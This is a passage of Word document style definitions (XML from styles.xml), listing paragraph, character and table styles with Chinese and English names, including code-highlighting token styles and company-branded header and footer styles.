    <w:name w:val="yuanlr"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="480" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="52">
    <w:name w:val="页眉与页脚"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:framePr w:wrap="around" w:vAnchor="margin" w:hAnchor="text" w:y="1"/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53">
    <w:name w:val="yuanlr                                                                                              袁利荣"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="480" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="Caption Char"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="12"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="55">
    <w:name w:val="标题样式"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="11"/>
    <w:autoRedefine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character" w:customStyle="1" w:styleId="56">
    <w:name w:val="题注 字符1"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="12"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="57">
    <w:name w:val="0-正文"/>
    <w:basedOn w:val="50"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="58">
    <w:name w:val="页眉 字符"/>
    <w:link w:val="24"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="59">
    <w:name w:val="页脚 字符"/>
    <w:link w:val="23"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="标题 2 Char"/>
    <w:link w:val="3"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="9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61">
    <w:name w:val="批注框文本 字符"/>
    <w:link w:val="2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2">
    <w:name w:val="标题 1 Char"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="2"/>
    <w:autoRedefine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63">
    <w:name w:val="b1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FF0000"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="m1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="pi1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="66">
    <w:name w:val="t1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="990000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="67">
    <w:name w:val="ns1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="68">
    <w:name w:val="tx1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="69">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:link w:val="29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70">
    <w:name w:val="headline-content2"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="71">
    <w:name w:val="font_big181"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="72">
    <w:name w:val="标题 3 Char"/>
    <w:link w:val="4"/>
    <w:autoRedefine/>
    <w:semiHidden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73">
    <w:name w:val="文档结构图 字符"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="14"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="74">
    <w:name w:val="标准正文"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="仿宋"/>
      <w:lang w:eastAsia="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="75">
    <w:name w:val="列出段落3"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="76">
    <w:name w:val="hljs-name"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="77">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="11"/>
    <w:next w:val="11"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="78">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="79"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="79">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="80">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="12"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="81">
    <w:name w:val="页眉样式（甘肃海丰）"/>
    <w:basedOn w:val="24"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:line="320" w:lineRule="exact"/>
      <w:ind w:firstLine="950" w:firstLineChars="950"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:lang w:eastAsia="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="82">
    <w:name w:val="页角样式（甘肃海丰）"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:top w:val="single" w:color="auto" w:sz="6" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="left" w:pos="4815"/>
        <w:tab w:val="center" w:pos="5102"/>
        <w:tab w:val="right" w:pos="9354"/>
      </w:tabs>
      <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="320" w:lineRule="exact"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="83">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="84">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="45"/>
    <w:link w:val="83"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="85">
    <w:name w:val="pagenav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6">
    <w:name w:val="标题 2 Char1"/>
    <w:basedOn w:val="36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87">
    <w:name w:val="CNCERT_部检查_正文"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:firstLine="560" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="88">
    <w:name w:val="列出段落11"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="89">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="36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90">
    <w:name w:val="KeywordTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="007020"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="91">
    <w:name w:val="NormalTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="92">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="007020"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="93">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4070A0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="94">
    <w:name w:val="CommentTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="60A0B0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="95">
    <w:name w:val="tlid-translation"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="96">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="97">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="98">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="99">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="100">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="101">
    <w:name w:val="FunctionTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="06287E"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="102">
    <w:name w:val="DecValTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="40A070"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="103">
    <w:name w:val="默认"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:framePr w:wrap="around" w:vAnchor="margin" w:hAnchor="text" w:y="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="104">
    <w:name w:val="Hyperlink.0"/>
    <w:basedOn w:val="42"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single" w:color="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="105">
    <w:name w:val="ql-long-1917961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6">
    <w:name w:val="ql-author-19179616"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="107">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="108">
    <w:name w:val="hljs-number"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="109">
    <w:name w:val="Heading #1|1"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="38"/>
      <w:szCs w:val="38"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="110">
    <w:name w:val="Other|1"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="747474"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="111">
    <w:name w:val="Heading #2|1"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="160"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="34"/>
      <w:szCs w:val="34"/>
      <w:lang w:val="zh-TW" w:eastAsia="zh-TW" w:bidi="zh-TW"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="112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113">
    <w:name w:val="msolistparagraph"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="114">
    <w:name w:val="TOC 标题2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115">
    <w:name w:val="ImportTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="116">
    <w:name w:val="VariableTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="19177C"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="117">
    <w:name w:val="OperatorTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="118">
    <w:name w:val="BuiltInTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="119">
    <w:name w:val="CharTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="120">
    <w:name w:val="SpecialStringTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BB6688"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="121">
    <w:name w:val="SpecialCharTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="122">
    <w:name w:val="ControlFlowTok"/>
    <w:basedOn w:val="84"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="123">
    <w:name w:val="文档表格无标题行型（绿盟科技）"/>
    <w:basedOn w:val="35"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
    <w:tblPr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single" w:color="auto" w:sz="6" w:space="0"/>
        <w:insideV w:val="single" w:color="auto" w:sz="6" w:space="0"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:wordWrap/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Helv"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:rPr>
        <w:b/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="124">
    <w:name w:val="ec-pc_text-desc"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="125">
    <w:name w:val="列出段落1"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="126">
    <w:name w:val="正文（报告）"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:jc w:val="both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table" w:customStyle="1" w:styleId="127">
    <w:name w:val="文档表格标题行列型（绿盟科技）"/>
    <w:basedOn w:val="35"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
    <w:tblPr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rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体"/>
        <w:b/>
        <w:i w:val="0"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
        <w:vAlign w:val="center"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="128">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="4"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="华文细黑" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="129">
    <w:name w:val="石墨文档正文"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="130">
    <w:name w:val="data-title"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="131">
    <w:name w:val="页眉右端（绿盟科技）"/>
    <w:basedOn w:val="24"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="9"/>
      </w:pBdr>
      <w:spacing w:before="160"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="132">
    <w:name w:val="页脚左端（绿盟科技）"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="auto" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="133">
    <w:name w:val="代码"/>
    <w:basedOn w:val="50"/>
    <w:autoRedefine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EEECE1" w:themeFill="background2"/>
      <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="18"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="134">
    <w:name w:val="pspancolor"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="135">
    <w:name w:val="wrap"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="136">
    <w:name w:val="pointer"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="137">
    <w:name w:val="石墨文档标题 2"/>
    <w:next w:val="129"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="260" w:after="260"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="138">
    <w:name w:val="objectbox"/>
